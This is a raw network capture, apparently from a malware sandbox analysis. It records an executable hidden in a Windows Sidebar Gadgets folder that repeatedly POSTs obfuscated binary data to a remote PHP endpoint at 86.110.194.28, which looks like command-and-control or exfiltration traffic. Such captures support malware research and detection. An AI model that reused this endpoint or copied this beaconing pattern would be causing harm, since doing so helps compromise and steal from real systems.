                                                                                                                                                                  Jan 3, 2025 09:08:44.707519054 CET2576OUTData Raw: 5b 5d 5e 59 5d 5d 50 58 54 5b 59 5a 5b 55 57 5d 5f 52 5a 5b 52 5d 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^Y]]PXT[YZ[UW]_RZ[R]PD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(]68%<>8"$&%<%S"7=T78 ]'*$E0+9#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:08:45.052495003 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:45.186878920 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:44 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  98192.168.2.45010586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:45.316565990 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:45.660773039 CET2576OUTData Raw: 5b 50 5b 5b 58 5a 50 59 54 5b 59 5a 5b 5e 57 5d 5f 53 5a 55 52 52 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[[XZPYT[YZ[^W]_SZURRPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(.^!:0&/$*5$=Z'/R $=V!(3$9#'$(#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:46.023468018 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:46.160890102 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:45 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  99192.168.2.45010686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:46.288162947 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  100192.168.2.45010786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:46.432207108 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2140
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:46.785794020 CET2140OUTData Raw: 5b 53 5e 5a 58 5e 50 5f 54 5b 59 5a 5b 51 57 58 5f 51 5a 5d 52 52 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [S^ZX^P_T[YZ[QWX_QZ]RRPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)>&69,1?,>.X'$"&?"7$%:;&,,T+#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:08:47.109169960 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:47.248447895 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:47 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 04 31 28 2a 58 2a 11 01 10 25 33 29 13 21 30 30 58 2f 20 3a 42 22 2c 0f 11 25 3b 3b 0e 3c 13 2a 45 2b 0a 25 12 23 10 39 55 2b 0a 28 5d 03 10 39 11 3f 13 2f 12 3e 3e 35 1b 39 0e 30 03 30 34 3b 03 2a 0d 0c 08 26 3f 22 55 21 03 2b 57 2a 20 22 07 33 05 0a 16 2a 23 37 5a 24 17 20 54 0b 17 24 08 33 0e 2f 5f 27 38 0f 11 3d 37 16 10 27 14 3a 0f 36 3c 2e 1a 22 39 05 02 38 33 29 52 27 5e 39 1c 2a 10 01 55 26 3a 21 00 24 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '1(*X*%3)!00X/ :B",%;;<*E+%#9U+(]9?/>>59004;*&?"U!+W* "3*#7Z$ T$3/_'8=7':6<."983)R'^9*U&:!$.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  101192.168.2.45010886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:46.551809072 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:46.910687923 CET2576OUTData Raw: 5b 54 5e 5c 58 57 50 5e 54 5b 59 5a 5b 56 57 5f 5f 53 5a 5e 52 57 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^\XWP^T[YZ[VW__SZ^RWPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(==6)/&C);%$':'/%V5444Y$)','<9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:47.248105049 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:47.381608009 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:47 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  102192.168.2.45010986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:47.508972883 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:47.863890886 CET2576OUTData Raw: 5e 55 5e 5e 58 5f 50 5b 54 5b 59 5a 5b 50 57 5d 5f 56 5a 55 52 50 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U^^X_P[T[YZ[PW]_VZURPPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<!W%<$*;>Y%45'/%W6':#3%98@3<<R+9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:48.200901031 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:48.332075119 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:48 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  103192.168.2.45011086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:48.460347891 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:48.819817066 CET2576OUTData Raw: 5e 57 5e 5e 58 5c 50 5a 54 5b 59 5a 5b 54 57 58 5f 50 5a 5e 52 52 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^W^^X\PZT[YZ[TWX_PZ^RRPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+->"8V%*!$&%R"4*#84Y$:7'<$<)#Y'$X.-
                                                                                                                                                                  Jan 3, 2025 09:08:49.151549101 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:49.285171986 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:49 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  104192.168.2.45011186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:49.413886070 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:49.770046949 CET2568OUTData Raw: 5e 50 5e 5e 58 5c 50 5f 54 5b 59 5a 5b 57 57 5e 5f 55 5a 5b 52 53 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P^^X\P_T[YZ[WW^_UZ[RSPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D<>[!\0W2<*+%0\&/5!'%4<\370Y?)9#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:50.132627010 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:50.267740011 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:50 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  105192.168.2.45011286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:50.395589113 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:50.754479885 CET2576OUTData Raw: 5e 51 5b 5c 58 58 50 51 54 5b 59 5a 5b 56 57 5a 5f 50 5a 5e 52 5d 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q[\XXPQT[YZ[VWZ_PZ^R]PH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+.5^6) &E)+*^0'%X2?=6"#; \3_#08+#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:51.257714033 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:51.257735968 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:50 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  106192.168.2.45011386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:51.438682079 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:51.785674095 CET2576OUTData Raw: 5b 5d 5e 51 5d 5e 50 5f 54 5b 59 5a 5b 5f 57 5b 5f 50 5a 5a 52 55 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^Q]^P_T[YZ[_W[_PZZRUPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+==!\,1,A>;-%791?) '54;7%:(@$?<V<)#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:52.142260075 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  107192.168.2.45011486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:52.260279894 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:52.613795042 CET2164OUTData Raw: 5e 52 5b 58 5d 5b 50 5b 54 5b 59 5a 5b 56 57 5b 5f 54 5a 55 52 5c 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^R[X][P[T[YZ[VW[_TZUR\PE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?["*%=;'$%?57=U7^00;3$S()#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:52.949110031 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:53.079885006 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:52 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 01 26 05 2e 5a 28 2c 38 07 26 23 2d 5e 23 33 3b 04 38 1e 2a 45 35 3f 26 06 25 2b 0a 56 3c 3e 2a 45 29 20 26 0e 34 3d 39 53 28 0a 28 5d 03 10 39 5a 28 04 33 11 3e 10 0c 00 2c 34 3f 14 24 09 24 5b 2a 23 25 1c 25 3c 07 0c 20 2d 23 52 29 33 26 00 26 28 38 5b 2b 20 0e 06 27 07 20 54 0b 17 24 0f 24 56 24 07 26 28 25 58 2a 19 12 5b 30 04 0f 56 36 3f 35 0e 23 39 0e 16 3b 56 39 11 24 38 35 53 3e 3d 37 55 31 3a 22 11 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '&.Z(,8&#-^#3;8*E5?&%+V<>*E) &4=9S((]9Z(3>,4?$$[*#%%< -#R)3&&(8[+ ' T$$V$&(%X*[0V6?5#9;V9$85S>=7U1:"&;.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  108192.168.2.45011586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:52.381704092 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:52.738790989 CET2576OUTData Raw: 5b 51 5e 50 58 5e 55 5b 54 5b 59 5a 5b 5f 57 58 5f 54 5a 5a 52 56 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^PX^U[T[YZ[_WX_TZZRVPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&C+>"5 T1<=;Y'42/) '94+?''&/')9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:53.066138029 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:53.198203087 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:52 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  109192.168.2.45011686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:53.333003998 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
